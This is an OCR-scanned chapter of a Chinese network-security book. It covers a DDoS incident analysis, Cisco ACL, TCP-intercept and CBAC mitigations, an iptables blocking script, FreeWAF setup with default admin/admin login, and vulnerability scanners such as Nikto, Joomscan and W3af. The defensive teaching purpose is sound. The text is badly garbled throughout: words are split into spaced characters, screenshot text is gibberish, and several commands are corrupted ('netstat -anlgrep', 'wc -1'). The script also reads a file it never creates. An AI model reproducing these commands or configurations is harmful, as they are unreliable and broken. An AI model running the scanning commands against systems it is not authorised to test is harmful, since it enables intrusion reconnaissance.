为 了 追踪 这 个 伪装 的 地 址 ， 必 须 查 询 每 个 路 由 器 上 的 NetFlow 缓存 ， 才 能 确定 流量 进入 了 
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哪个 接口 ， 然 后 通过 这 些 路 由 器 一 次 一 个 接口 地 往 回 一 路 追踪 ， 直 至 找到 那个 IP 地 址 源 。 
然而 这 样 做 是 非常 难 的 , 因为 在 Web Server 和 攻击 者 的 发 起 PC 之 间 可 能 经 由 许多 路 由 器 ， 
而 且 属 于 不 同 的 组 织 。 另 外 ， 必 须 在 攻击 正在 进行 时 做 这 些 分 析 。 

经 过 分 析 之 后 ， 将 防火 墙 日 志和 路 由 器 日 志 里 的 信息 关联 起 来 ， 发 现 了 一 些 有 趣 的 相 
似 性 , 如 图 1.6 中 黑色 标记 处 。 攻 击 的 目标 显然 是 Web 服务 器 192.68.0.175, 端口 为 UDP 7， 
即 回 显 端口 。 这 看 起 来 很 像 拒 绝 服务 攻击 〈 但 还 不 能 确定 ， 因 为 攻击 的 分 布 很 随意 ) 。 地 
址 看 起 来 多 多 少 少 是 随意 而 分 散 的 ， 只 有 一 个 源 地址 是 固定 不 变 的 ， 其 源 端 口号 也 没 变 。 

接着 笔者 注意 到 路 由 器 日 志 , 立刻 发 现 攻 击发 生 时 路 由 器 日 志 上 有 大 量 的 64 字 节 的 数 
据 包 ， 而 此 时 Web 服务 器 日 志 上 没有 任何 问题 。“ 案 发 ”时 路 由 器 日 志 里 还 有 大 量 的 
“UDP-other” 数 据 包 ， 而 Web 服务 器 日 志 也 一 切 正 常 。 这 种 现象 与 基于 UDP 的 拒绝 服务 
攻击 的 假设 是 很 相符 的 。 
攻击 者 正 是 用 许多 小 的 UDP 数据 包 对 Web 服务 器 的 回 显 (echo 7) 端口 进行 洪 泛 式 攻 
击 ， 因 此 下 一 步 的 任务 就 是 阻止 这 一 行为 。 首 先 ， 在 路 由 器 上 堵截 攻击 ， 快 速 地 为 路 由 器 
设置 一 个 过 滤 规 则 。 因 为 源 地 址 的 来 源 很 随机 ， 很 难 用 限制 某 个 地 址 或 某 一 块 范围 的 地 址 
来 阻止 攻击 ， 因 此 决定 禁止 所 有 发 给 192.168.0.175 的 UDP 包 。 这 种 做 法 会 使 服务 器 丧失 
某 些 功 能 ， 如 DNS， 但 至 少 能 让 Web 服务 器 正常 工作 。 

路 由 器 最 初 的 临时 DoS 访问 控制 链表 (ACL) 如 下 


access-list 121 remark Temporary block DoS attack on web server 192.168.0.175 
access-list 105 deny udp any host 192.168.0.175 


access-list 105 permit ip any any 


这 样 做 为 Web 服务 器 减轻 了 负担 , 但 攻击 仍 能 到 达 Web, 这 在 一 定 程度 上 降低 了 网 络 
性 能 。 那 么 下 一 步 工作 是 联系 上 游 带 宽 提 供 商 ,请 他 们 暂时 限制 所 有 在 网 站 端口 ?上 的 UDP 
入 流量 ， 这 样 做 会 显著 降低 网 络 到 服务 器 的 流量 。 


1.10.3 ”针对 措施 


对 于 预防 及 缓解 这 种 带宽 相关 的 DoS 攻击 并 没有 什么 灵丹妙药 。 本 质 上 , 这 是 一 种 “ 粗 
管子 打败 细 管 子 ” 的 攻击 。 攻 击 者 能 “指使 ”更 多 带宽 ， 有 时 甚至 是 巨大 的 带宽 ， 击 省 带 
宽 不 够 的 网 络 。 在 这 种 情况 下 ， 预 防 和 缓解 应 相辅相成 。 
有 许多 方法 可 以 使 攻击 更 难 发 生 ， 或 者 在 攻击 发 生 时 减 小 其 影响 ， 具 体 如 下 。 
@ 网 络 入 口 过 滤 : 网 络 服务 提供 商 应 在 下 游 网 络 上 设置 入 口 过 滤 ， 以 防止 假 信息 包 进 
入 网 络 (而 把 它们 留 在 Internet 上 )， 这 将 防止 伪装 了 P 地 址 ， 从 而 易于 追踪 。 

@ 网 络 流量 过 滤 : 过 滤 掉 网 络 不 需要 的 流量 总 是 不 会 错 的 ， 还 能 防止 DoS 攻击 , 但 
为 了 达到 效果 ， 这 些 过 滤器 应 尽量 设置 在 网 络 上 游 。 

@ 网 络 流量 速率 限制 : 一 些 路 由 器 有 流量 速率 的 最 高 限制 ， 些 限制 条 款 将 加 强 带宽 策 
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略 ， 并 允许 给 定 类 型 的 网 络 流量 匹配 有 限 的 带宽 。 这 一 措施 也 能 预先 缓解 正在 进行 
的 攻击 ， 同 时 ， 这 些 过 滤 尽量 设置 在 网 络 上 游 ( 尽 可 能 靠近 攻击 者 )。 

@ 入 侵 检测 系统 和 主机 监听 工具 : IDS 能 警告 网 络 管 理 员 攻击 的 发 生 时 间 ， 以 及 攻击 
者 使 用 的 攻击 工具 , 这 将 能 协助 阻止 攻击 。 主 机 监听 工具 能 警告 管理 员 系 统 中 是 否 
出 现 DoS 工具 。 

@ 单 点 传送 RPF: 这 是 CEF 用 于 检查 在 接口 收 到 的 数据 包 的 另 一 特性 。 如 果 源 IP 地 
址 CEF 表 上 不 具有 与 指向 接收 数据 包 时 的 接口 一 致 的 路 由 ， 路 由 器 就 会 丢掉 这 个 
数据 包 。 技 弃 RPF 的 妙 处 在 于 ， 它 阻止 了 所 有 伪装 源 卫 地 址 的 攻击 。 


. 如 何 检测 是 否 遭 受 了 DDoS 攻击 
在 1.8.2 小 节 中 详细 讲 过 如 何 检测 攻击 , 另外 比较 有 效 的 方法 就 是 利用 主机 监测 系统 和 
Ids 系统 联合 分 析 ， 通 过 图 像 可 以 明显 看 出 在 某 一 时 间 段 内 的 流量 激增 ， 如 果 这 时 通过 
EtherApe 查看 可 以 很 容易 发 现 被 攻击 的 服务 器 连接 数量 相当 高 ， 图 1.8 中 绿色 的 大 圆 点 就 
是 受 攻击 的 服务 器 ,绿色 小 圆 点 就 是 虚构 出 来 的 IP 地 址 ， 统 统 被 EtherApe 实时 记录 下 来 。 
这 两 者 在 后 面 章节 会 详细 讲 到 。 


Mem ey se 的 
n 


图 1.8 ”EtherApe 显示 服务 器 连接 数 
还 可 以 通过 命令 “# netstat -anlgrep SYN_RECVIwc -1” 来 检测 ， 如 果 数 值 很 高 ， 如 达到 
上 二 数值 ， 那 么 肯定 是 受到 了 攻击 。 
图 1.9 为 在 受到 DDoS 攻击 时 Ntop 监控 记录 下 来 的 流量 激增 图 像 。 
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Global TCP/UDP Protocol Distribution 
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图 1.9 流量 激增 图 像 
图 1.10 为 Ossim 系统 中 的 Snort 记录 受到 DDoS 攻击 时 ， 成 功 显示 告警 信息 的 图 像 。 
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图 1.10 告警 信息 图 像 
例如 ， 某 网 站 在 受到 DDoS 攻击 时 ，TCP 链接 如 图 1.11 所 示 。 
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tcp 0 0 192.168.150.239:80 SYN_RECY 
tcp 0 a 80 SYN_RECY 
tcp 0 SYN_RECY 
tcp 0 SYN_RECY 
tcp 0 SYN_RECY 
tcp 0 SYN_RI 
tcp 0 SYN_RI 
tcp 0 SYN_RI 
tcp 0 SYN_RECY 
tcp 0 SYN_RECY 
tcp 0 SYN_RECY 
tcp 0 SYN_RECY 
tcp 0 SYN_RECY 
tcp 0 SYN_RECY 
tcp 0 SYN_RECY 
tcp 0 SYN_RECY 
tcp 0 SYN_RECY 
tcp 0 SYN_RECY 
tcp 0 SYN_RECY 
图 1.11 TCP 链接 

#netstat -na |grep SYN RECV |wc -1 

989 

数值 达到 989， 有 近 千 条 ， 这 说 明 已 经 受到 了 DDoS 攻击 。 

2. 防御 措施 


看 了 上 面 的 实际 案例 后 我 们 可 以 了 解 到 ， 许 多 DDoS 攻击 都 很 难 应 对 ， 因 为 搞 破坏 的 
主机 所 发 出 的 请 求 都 是 完全 合法 、 符 合 标准 的 ， 只 是 数量 太 大 。 我 们 可 以 先 在 路 由 器 上 借 
助 恰当 的 ACL 来 阻 断 ICMP echo 请 求 。 但 是 ， 如 果 有 自己 的 自治 系统 ， 就 应 该 允许 从 因 
特 网 上 Ping 你 。 不 能 Ping 通 带 会 使 ISP 或 技术 支持 团队 《如果 有 的 话 ) 丧失 某 些 故障 排 
解 能 力 〈 就 是 说 这 种 方法 如 果 失 效 我 们 可 用 iptables 来 防御 ) ， 例 如 : 


Router (config)#ip tcp intercept list 101 

Router (config)#ip tcp intercept max-incomplete high 3500 
Router (config)#ip tcp intercept max-incomplete low 3000 
Router (config)#ip tcp intercept one-minute high 2500 
Router (config)#ip tcp intercept one-minute low 2000 


Router (config)#access-list 101 permit any any 


如 果 能 采用 基于 上 下 文 的 访问 控制 (Context Based Access Control,CBAC) ， 则 可 以 用 
其 超时 和 阔 值 设置 应 对 SYN 洪流 和 UDP 垃圾 洪流 ， 例 如 : 


Router (config)# ip inspect tcp synwait-time 20 
Router (config)# ip inspect tcp idle-time 60 
Router (config)# ip inspect udp idle-time 20 
Router (config)# ip inspect max-incomplete high 400 
Router (config)# ip inspect max-incomplete low 300 


Router (config)# ip inspect one-minute high 600 
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Router (config)# ip inspect one-minute low 500 


Router (config)# ip inspect tcp max-incomplete host 300 block-time 0 
注意 : 建议 不 要 同时 使 用 TCP 截获 和 CBAC 防御 功能 ， 因 为 这 可 能 会 导致 路 由 器 过 载 。 
打开 Cisco 快速 转发 (Cisco Express Forwarding，CEF) 功能 可 帮助 路 由 器 防御 数据 包 


为 随机 源 地 址 的 洪流 。 可 以 对 调度 程序 做 些 设置 , 避免 在 洪流 的 冲击 下 路 由 器 的 CPU 完全 
过 载 : 


Router (config)#scheduler allocate 3000 1000 


在 做 了 这 样 的 配置 后 ，IOS 会 用 3s 的 时 间 处 理 网 络 接口 中 断 请 求 ， 之 后 用 1s 执行 其 
他 任务 。 对 于 较 早 的 系统 ， 可 能 还 必须 使 用 命令 : scheduler interval<milliseconds>。 


3. 利用 iptables 预防 DDoS 脚本 


#!/bin/bash 

netstat -anlgrep SYN RECVIawk '{print$5}'|lawk -F: '{print$1}'|sortluniq 
-clsort -rnlawk '{if ($1 >1) print $2}°' 

for i in $(cat /tmp/dropip) 

do 

/sbin/iptables -A INPUT -s $i -j DROP 

echo "$i kill at ‘date‘" >>/var/log/ddos 


done 


该 脚本 会 把 处 于 SYN_RECYV 状态 并 且 数 量 达到 5 个 的 IP 做 统计 ， 并 且 写 到 iptables 
的 INPUT 链 中 做 拒绝 处 理 。 


1.10.4 小结 


无 论 是 出 于 捣乱 、 报 复 、 敲 诈 勒 索 、 发 起 更 大 规模 攻击 或 其 他 目的 ，DoS 或 DDoS 攻 
击 都 是 一 种 不 容 轻 视 的 威胁 。 非 同一 般 的 DoS 攻击 通常 是 利用 某 种 不 完整 的 漏洞 一 一 使 系 
统 服务 朋 溃 ， 而 不 是 将 控制 权 交 给 攻击 者 。 防 范 这 种 攻击 的 办 法 是 及 时 打上 来 自 厂商 的 补 
丁 ， 对 于 Cisco 系统 ， 应 及 时 将 操作 系统 升级 到 更 新 版 本 。 同 时 关闭 有 漏洞 的 服务 ， 或 者 
至 少 要 用 访问 控制 列表 限制 访问 。 常 规 的 DoS 攻击 ， 特 别 是 DDoS 攻击 ， 经 常 不 是 那么 有 
章法 ， 也 更 难 防 范 。 如 果 整 个 带宽 都 被 整 脚 的 Ping 洪流 所 耗 尽 ， 我 们 所 能 做 的 就 很 有 限 ， 
有 些 DDoS 攻击 的 后 果 非 常 严重 。 最 后 ， 必 须 与 ISP 和 权力 部 门 协作 ， 尽 可 能 从 源头 上 阻 
止 攻击 。 

需要 用 不 同 供应 商 、 不 同 AS 路 径 并 支持 负载 均衡 功能 的 不 止 一 条 到 因特网 的 连接 ， 
但 这 与 应 对 消耗 高 带宽 的 常规 DoS/DDoS 洪流 的 要 求 还 相差 很 远 。 我 们 可 以 用 CAR 或 
NBAR 来 抛弃 数据 包 或 限制 发 动 进攻 的 网 络 流速 , 减轻 路 由 器 CPU 的 负担 , 减少 对 缓冲 区 
和 路 由 器 之 后 的 主机 的 占用 。 
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1.11 基于 开源 的 Web 应 用 防火 墙 (FreeWAF) 


现在 不 少 企 业 目 前 并 没有 防 算 改 系统 ， 主 要 依靠 网 络 管理 人 员 对 需要 保护 的 网 站 进行 24 
小 时 人 工 监控 〈 就 像 监控 论坛 发 帖 一 样 ) 。 一 旦 发 现 网 页 被 算 改 ， 通 过 ftp 上 传 原始 文件 (或 
数据 库 备 份 文件 ) 对 其 修复 还 原 。 所 以 急需 一 款 能 够 自动 化 完成 监控 的 软件 ， 下 面 介绍 的 就 是 
开源 世界 中 的 一 种 WAF 软件 。 

Web Application Firewall (网 站 应 用 级 入 侵 防御 系统 ) 简称 WAF， 而 FreeWAF 是 一 款 开 
源 的 Web 应 用 防火 墙 , 正 是 由 于 在 Web 应 用 中 算 改 网 页 和 在 网 页 中 植 入 恶意 代码 的 事件 频 发 ， 
所 以 才 催生 了 这 样 一 种 产品 ，FreeWAF 工作 在 应 用 层 ， 对 HTTP (S) 进行 双向 深层 次 检测 : 
对 于 来 自 Internet 的 攻击 进行 实时 防护 ， 避 免 黑客 利用 应 用 层 漏洞 非法 获取 或 破坏 网 站 数据 ， 
可 以 有 效 地 抵御 黑客 的 各 种 攻击 ， 如 SQL 注入 攻击 、XSS 攻击 、CSRF 攻击 、 缓 冲 区 溢出 、 
应 用 层 DOS/DDOS 攻击 等 。 它 的 检测 原理 是 采用 一 个 网 页 检测 程序 ， 以 轮 询 方式 ， 逐 个 扫描 
网 页 文件 的 方式 (实际 上 是 逐个 文件 去 读 , 然后 和 真实 网 页 相 比较 ?来 判断 对 网 页 的 非法 修改 ， 
采用 这 种 技术 一 般 会 有 一 定 的 时 间 间 隔 ， 而 且 网 站 文件 越 多 ， 时 间 间 隔 越 长 ， 不 能 保证 被 黑客 
修改 的 网 页 不 被 访问 者 看 到 。 

安装 方法 : 其 实 FreeWAF 也 是 一 个 基于 Ubuntu Linux 12.04 的 系统 ，64 位 版 ， 最 新 版 本 
是 1.0, 大 小 为 700MB 左右 ， 只 不 过 它 把 一 些 有 关 Web 安全 应 用 的 软件 都 部 署 好 了 方便 使 用 。 
下 载 地 址 : http:/Wsourceforge.net/projects/wafwwfiles/1.0.0/bin/。 另 外 它 的 源 代码 是 通过 SVN 和 
Git 进行 管理 ， 目 前 提供 源 代 码 下 载 的 仅 有 两 个 站 点 ， 分 别 为 sourceforge 和 github。 在 部 署 上 ， 
一 般 以 透明 代理 模式 接 在 Web 应 用 服务 器 前 端 ， 以 防护 SQL 注入 Xss 攻击 等 。 在 配置 上 也 很 
简单 只 要 输入 服务 器 IP 就 能 用 出 现 Web GUI 界面 ， 配 置 方法 大 家 可 以 查看 网 站 帮助 文件 。 


1.11.1 安装 FreeWAF 注意 事项 


虽说 FreeWAF 就 是 个 改装 的 Ubuntu， 后 端 才 用 MySQL 数据 库 ， 不 过 有 些 地 方 是 需要 注意 : 


@ 软件 够 用 就 行 ， 在 选择 是 否 下 载 和 安装 更 新 ， 及 第 三 方 软件 提示 时 ， 不 要 选择 
“Download updates while installing 和 Install this third-party software 以 免 造 成 一 些 不 

必要 的 故障 。 

@ 分 区 注意 ， 对 于 FreeWAF 来 说 ， 用 户 需要 划分 出 40GB 的 逻辑 分 区 ， 该 分 区 用 途 是 为 
了 防 自 改 使 用 。 如 果 选 用 的 Ubuntu 12.04 Server 版 本 可 以 自己 定义 专用 挂 节点 。 

@ 因为 FreeWAF 是 个 安全 设备 ， 在 登录 方式 选择 时 不 能 选择 自动 登录 。 

@ 准备 两 块 网 卡 ， 有 的 读者 一 开始 用 虚拟 机 装 ， 但 只 配置 了 一 块 网 卡 ， 到 后 来 进入 配置 
向 导 时 好 多 配置 模式 没有 出 来 ， 所 以 这 一 点 需要 注意 。 


FreeWAF 安装 步骤 说 明 如 下 。 


在 分 区 时 暂时 先 分 出 40GB 的 逻辑 分 区 ， 且 不 Mount 上 ， 也 就 是 保持 挂 节点 为 空 ， 
留 着 最 后 再 操作 ， 如 图 1.12 和 图 1.13 所 示 。 
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Allocate drive space 


一 -一 一 

国 sdal (extq) 国 5das(ext4) 国 5da6(Unuxswap) 口 freespace 
27.4GB 500GB 200GB 117.45B 
pevice pp 

/ev/soa 


Create a new partition 


/dewsdat ext 
/dev/sdas extd Type Forthenewpartition: 
/dev/sda6 swal 


New partition size in megabytes (1000000 bytes 
Ireespace 


Location for the new partitiorr 


Device forbootld Useas: Ext4 journaling fle system 


Jdevlsda VMwad NMouncpomt 


Cancel 


图 1.12 分 区 


Install 


Allocate drive space 


国 5dal (ext4) 国 sdas(ext4) 图 sda6(unuxcswap) 图 5da7(ext4) O freespace 


4CB 200cB 400CB 774CB 
Device Type Mountpoint Format? Size Used 

oesas 

/dev/sdal exta / 27368 MB unknown 


/dev/sdas ext4 Nar 49999 MB unknown 


/dev/sda7 exts ~ 39398 MB unknown 
ee 
Thange Delete Revert 
Devkeror boot loader Installatior: 


/dev/sda VMware, vMware Virtuals [214.7 G8) 


Quit Back Install Now 
图 1.13 分 配 磁盘 空间 
贺 系统 提示 没有 mount， 这 时 ， 继 续 操 作 ， 如 图 1.14 所 示 。 


Allocate drive space 


ou want to return to the partitioning menu? 


国 sda1(ext4) 国 sda5 (ext4) 国 5da6 (linux-| No mount pointis assigned for the ext4 file system in 
274GB 50.0 GB 200G8 | partition#7oFfSCSI3(0,0,0) (sda). 


Fyou do not go back to the partitioning menu and assigna 


Device Type Mount point Format? Sizd mount point from there, this partition willnot beusedatall. 


/oev/saa 
/dev/sda1 ext4 / 
/dewsdas ext4 /var 


/dev/sda6_sw: 19998 MB_unknown 2 
< (sda7 ext4 39998 MB_unkno 


Change... Delete | | Revert 


Device for boot loader installation: 


/dev/sda VMware, VMware Virtual S (214.7 GB) 和 


王 Be 
图 1.14 系统 提示 没有 mount 
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贺 等 系统 安装 完 ， 首次 登录 时 需要 手工 建立 /var/tamper 目录 ， 修改/etc/fstab 文件 ， 然 后 
重启 生效 。 


我 们 说 明 一 下 怎么 修改 /etc/fstab 文件 ， 比 如 用 户 创建 的 逻辑 分 区 名 称 为 /dev/sda7， 文件 系 
统 为 ext4 ,那么 需要 在 文件 中 增加 如 下 内 容 : 


/dev/sda7 /var/tamper ext4 defaults 0 0 


注意 在 没有 配置 前 , /dev/sda7 还 是 有 地 方 挂 载 的 , 位 置 在 /media/0ea67a60-ace1-4244-9884- 
5d38f94405b8 目录 上 。 


1.11.2 ”FreeWAF 网 络 部 署 


与 其 他 安全 设备 类 似 ，FreeWAF 也 支持 旁 路 模式 和 网 桥 模 式 。 旁 路 模式 仅 对 请 求 相应 的 
HTTP/HTTPS 数据 包 检 测 ， 而 不 进行 拦截 。 需 要 注意 的 是 ， 与 FreeWAF 相连 接 的 交换 机 必须 
支持 端口 镜像 ， 否 则 无 法 嗅 探 到 报 文 ， 这 种 模式 的 优点 是 无 需 改变 网 络 拓扑 ， 部 署 中 也 不 用 中 
断 网 络 ， 出 现 了 故障 也 不 会 影响 整个 网 络 ,相对 比较 灵活 ,笔者 建议 在 初次 使 用 时 采用 这 种 模 
式 。 而 网 桥 模式 由 于 是 串 在 链 路 中 ， 经 过 策略 设置 ， 可 以 配置 成 拦截 的 。 

首次 使 用 配置 访问 http://ip:18080/， 用 户 名 和 密码 都 是 admin。 

首先 单 击 配置 界面 的 配置 向 导 , 选择 离线 模式 , 然后 编辑 策略 。 系统 有 个 默认 的 安全 策略 ， 
如 图 1.15 如 果 没 有 特殊 要 求 使 用 这 个 策略 就 可 以 了 ， 也 可 以 直接 修改 它 。 


司 eant 
加 记录 日志 
eich Ld 
ieant 
下 ane 
国 wieans | 
轩 ieant 
Es en: 
Bieant 2 
a 四 seanz | 
加 启用 Mise 帮 示 卫 护 ar ER eane 
恒 局 NW 在 a 所 扩 入 护 。 动 /+ en 
时 局 用 日 录 未 3| 擅 护 wr a Cieanz 


本 EE] 


图 1.15 可 以 直接 使 用 默认 的 安全 策略 
然后 配置 监听 端口 配置 ， 点 击 添加 按钮 ， 就 可 以 添加 所 要 监听 的 后 端 服务 器 一， 协议 类 
型 以 及 端口 号 。 
最 后 选择 服务 器 策略 ， 都 选择 为 默认 即 可 。 
下 一 步 是 报表 显示 。 默 认 情况 下 ， 需 要 手工 创建 报表 ， 方 法 很 简单 ， 在 左 侧 日 志 菜单 中 选 
择 创 建 及 时 报表 即 可 ， 如 图 1.16 所 示 。 


=*。62。 
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站 最 要 名 稳 本 下 要 型 者 作 
口 a report_31947 Et 稚 更 王者 
2 report_7067 6 和 到 王者 
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图 1.16 选择 创建 及 时 报表 


1.11.3” 防 算 改 设置 


这 里 的 防 算 改 基本 思路 就 是 通过 ftp/sftp 协议 进行 网 站 的 镜像 备份 ， 发 现 改 动 就 自动 上 传 
备份 并 告警 ， 防 算 改 配置 页 面 如 图 1.17 和 图 1.18 所 示 。 

SFTP 是 Secure File Transfer Protocol 的 缩写 ， 意 为 安全 文件 传送 协议 。 可 以 为 传输 文件 提 
供 一 种 安全 的 加 密 方法 ， 不 易 被 截获 。SFTP 与 FTP 有 着 一 样 的 语法 和 功能 。SFTP 本 身 没有 
单独 的 守护 进程 ,必须 使 用 sshd 守护 进程 来 完成 相应 的 连接 操作 ， 所 以 它 是 一 个 客户 端 程序 。 
而 且 由 于 采用 了 使 用 了 加 密 / 解 密 技 术 ， 所 以 传输 效率 比 FTP 要 低 。 
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system | 
网 站 名 称 : 


[WW system saus 
局 用 文件 复 改 监控 : 
留 >sen nprmati 
拉 : 
.要 aumorzaton ntt 
二 机 名 HP 地 址 : 152168150120 
» monitoring 
过 接 关 型 : afp) 
» logMenu 
SFTPIFTPN: 21 
» manager 
网 站 文件 所 在 日 好 : Kerhww/html 
en 丈 接 用 户 ; ET 
» web protection 汗 扫 未 生 : 
ee 告警 邮件 地 址 : 


图 pages tampern | bs 全 文件 咎 必 的 监控 检查 间 大 不 能 为 


其 它 陪 第 文件 自 改 的 监 兴 检查 间隔 不 能 。 
为 空 : 


监控 阅 径 的 级 数 : 


1000 KB(IKB=1*1024B, 1KB=1* 


超过 此 大 小 的 文件 不 收监 控 : 6 —— 


100 MiB (IMiB = 1*1024KiB , 1MB = 1* 


备份 文件 的 秦 盘 空间 : 1000KBj= 


图 1.17 防 算 改 配置 页 面 
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图 1.18 攻击 日 志 页 面 
上 面 讲 的 FreeWAF 是 完全 开源 的 系统 ， 和 它 类 似 的 还 有 一 款 Linux 平台 下 的 网 关 过 滤 软 


件 Untangle。Untangle 是 基于 Linux 系统 的 网 关 过 滤 ， 反 病毒 和 蠕虫 的 系统 效果 比 FreeWAF 
要 好 ， 而 且 官方 网 站 更 新 非常 快 ， 不 过 只 能 试用 15 天 。 


1.12 ”Web 漏洞 扫描 工具 


我 们 可 以 用 下 面 这 款 工 具 来 探测 Web 服务 器 的 漏洞 ，Nikto 是 一 款 开源 的 (GPL) 网 页 服 
务 器 扫描 器 , 它 可 以 对 网 页 服务 器 进行 全 面 的 多 种 扫描 , 包含 超过 3300 种 有 潜在 危险 的 文件 ; 
包括 多 种 有 潜在 危险 的 文件 、CGI 及 其 他 问题 ， 它 可 以 扫描 指定 主机 的 Web 类 型 、 主 机 名 、 
特定 目录 、Cookie、 特 定 CGI 漏洞 、 返 回 主机 允许 的 http 模式 等 。 扫 描 项 和 插件 可 以 自动 更 
新 (如 果 需 要 ) 。 基 于 Whisker/libwhisker 完成 其 底层 功能 ， 这 是 一 款 非常 棒 的 工具 ，Nikto 
是 网 管 安全 人 员 必 备 的 Web 审计 工具 之 一 , 在 BT5 和 Ossim4.x 系统 中 包含 了 这 个 工具 (主要 
用 来 扫描 服务 器 漏洞 ， 同 时 提供 非常 详细 的 报告 ， 具 体内 容 可 以 参看 Ossim 实践 中 的 漏洞 扫 
描 生成 的 报告 ) 。 


1.12.1 Nikto 


Nikto 的 工作 原理 是 这 样 ， 首 先 抓 取 目 标 站 点 的 信息 ， 找 出 站 点 中 所 有 的 相关 文件 和 可 输 
入 点 ， 并 对 发 现 的 这 些 对 象 目 标 发 起 大 量 安全 检查 。 当 漏 扫 软 件 发 现 漏洞 时 ， 它 会 提供 很 详细 
的 技术 细节 ， 例 如 各 个 漏洞 库 的 漏洞 号 ， 并 帮助 用 户 修复 问题 。 

举例 说 明 ， 这 里 选用 BTS 工具 盘 〈Ossim 系统 也 可 以 ) 。 


#cd /pentest/web/nikto 
升级 漏洞 库 : 
#./nikto.pl -update 


扫描 主机 : 
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#./nikto.pl -h www.test.com 

命令 行 中 -hhost》 指 定 目标 主机 ， 可 以 是 下 或 域名 。 

#./nikto.pl -h www.test.com -p 80 443 8000 -o out.txt \\* 同 时 扫描 多 个 端口 
-p 指定 端口 ，-o 指定 输出 文件 。 

#./nikto.pl -h www.test.com -p 80-88  ”\\* 同 时 扫描 多 个 连续 端口 

扫描 80 一 90 共 10 个 端口 : 

#./nikto.pl -h 192.168.0.1 -p 80-90 

Nikto 能 够 输出 Web 格式 报告 ， 结 果 也 非常 详细 ， 如 图 1.19 所 示 。 


#./nikto.pl -h xxxx -oOo result.html -FE htm 


| 


后 Ss 1 file://pentest/web/nikto/result-127.html vec| | oo 


/m2e/ 

Method GET 
p /%2e/: Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or 

higher BID-2513. 

http://ocalhost:80/%2e/ 

http://127.0.0.1:80/%2e/ 

QSVDB-576 


统一 资源 
标示 符 


描述 漏洞 


/serverstatus 
产生 原因 Method GET 
ription /serverstatus: This reveals Apache information. Comment out appropriate line 
in httpd.conf or restrict access to allowed hosts. 
httplocalhost:80/serverstatus 
http://127.0.0.1:80/server.status 
OSVDB Entries QSVDB-561 
UR PpageServices 
HTTP Method GET 
Description Pageservices: The remote server may allow directory listings through Web 


Publisher by forcing the server to show all files via ‘open directory browsing’. 
Web Publisher should be disabled. CVE-1999-0269. 


Test Links httpillocalhost-807PageServices 
http://127.0.0.1:807PageServices 
OSVDB Entries QSVDB-119 
URI wp-cs-dump 
HTTP Method GET 
Description wp-cs-dump: The remote server may allow directory listings through web 


Publisher by forcing the server to show all files via ‘open directory browsing’. 


图 1.19 扫描 报告 


多 了 Pp 扫描 ， 当 扫描 多 个 他 时 ,可 以 有 多 种 写法 , 例如 也 :端口 、http://IP: 端 口 ， 直 接 加 下 
的 方式 ， 具 体例 子 见 图 1.20 所 示 。 
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图 1.20 扫描 多 个 也 及 结果 


HTML 格式 的 报告 比 txt 和 cvs 格式 的 报告 清晰 , Nikto 提供 的 信息 也 有 局 限 性 , 如 果 Nikto 
确定 有 一 个 问题 ， 那 就 值得 我 们 深究 到 底 ; 如 果 Nikto 什么 也 没 找到 ， 也 不 代表 就 不 存在 安全 
问题 。 另 外 ， 在 Windows 平台 .NET 环境 下 的 Nikto 也 是 和 Linux 平台 下 有 着 同样 功能 的 Web 
漏洞 检查 器 。 


注意 : 根据 扫描 前 对 象 的 情况 ,扫描 时 间 有 的 比较 长 ， 屏 幕 长 时 间 没有 结果 出 来 时 ， 要 知 
道 扫描 期 间 有 哪些 具体 动作 可 以 按 下 v 键 ， 系 统 便 以 详细 模式 显示 过 程 ， 再 按 下 “v” 键 则 关 
闭 详细 模式 ， 如 果 按 下 p 键 则 开启 进展 情况 报告 功能 ， 再 次 按 下 “p” 键 则 关闭 此 功能 ， 按 下 
空格 键 为 报告 当前 扫描 状态 。 


1.12.2 ”其 他 Web 检测 工具 
1. Joomla 


可 以 检测 Joomla 整 站 程序 搭建 的 网 站 是 否 存在 文件 包含 、SQL 注入 、 命 令 执行 等 漏洞 。 
这 将 帮助 Web 开发 人 员 和 网 站 管理 人 员 识 别 可 能 存在 的 安全 弱点 。 


程序 位 置 : Applications 一 Backtrack 一 Vulnerability Assessment 一 Web Application 
assessment 一 CMS vulnerabilities identification— Joomscan 


使 用 : .ioomscan.pl -u www.demo.com。 


2. Whatweb 


这 款 工具 从 原理 上 看 很 像 Nmap, 不 过 是 针对 Web 应 用 程序 ,包括 CMS 、 博 客 等 .WhatWeb 
多 达 900 个 插件 可 供 选 用 。 

程序 位 置 : Applications 一 BackTrack 一 Information Gathering 一 Web Application Analysis 一 
CMS Identification 一 whatweb 
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使 用 : ./whatweb -vwww.demo.com。 
3. W3af 


通常 对 网 站 可 能 利用 像 Nmap、Nessus 等 工具 进行 黑 盒 扫描 测试 ， 然 后 在 找到 漏洞 后 进行 
有 针对 的 修复 。 这 里 为 大 家 推荐 的 这 款 开 源 工 具名 叫 W3af (Web Application Attack and Audit 
Framework) ， 它 提供 了 渗透 测试 的 安全 平台 ,专门 针对 Web 网 站 服务 做 测试 ， 提 供 了 一 系列 
的 安全 检查 模块 。W3af 核心 和 它 的 插件 都 是 用 Python 编写 的 , 它 的 套件 分 为 探测 (discovery)、 
审核 (audit) 、 模 拟 攻击 (attack) 。W3af 提供 了 图 形 和 命令 行 两 种 不 同 的 操作 方式 。 
W3af 在 Debian 平台 下 的 安装 命令 如 下 : 


#apt-get install w3af 


1.12.3 ”利用 开源 软件 扫描 漏洞 
开源 市 场 上 的 许多 伟大 且 免 费 的 工具 可 以 帮助 企业 查看 漏洞 ， 这 里 重点 介绍 4 款 工具 。 
1. OpenVAS 
OpenVAS 是 开放 式 漏洞 评估 系统 , 也 可 以 说 它 是 一 个 包含 着 相关 工具 的 网 络 扫描 器 。 其 核心 
部 件 是 一 个 服务 器 ， 包 括 一 套 网 络 漏洞 测试 程序 ， 可 以 检测 远程 系统 和 应 用 程序 中 的 安全 问题 。 
2. Vega 


Vega 是 一 个 开放 源 代 码 的 Web 应 用 程序 安全 测试 平台 , Vega 能 够 帮助 验证 SQL 注入 、 跨 
站 脚本 (XSS) 、 敏 感 信息 泄露 和 其 他 一 些 安全 漏洞 。Vega 使 用 Java 编写 ， 有 GUI， 可 以 在 
Linux、OS X 和 Windows 下 运行 ， 下 载 地 址 : http://www.subgraph.com/vega_download.php。 


3. W3af 


W3af 是 一 个 Web 应 用 程序 攻击 和 检查 框架 。 该 项 目 己 超 过 130 个 插件 ， 其 中 包括 检查 
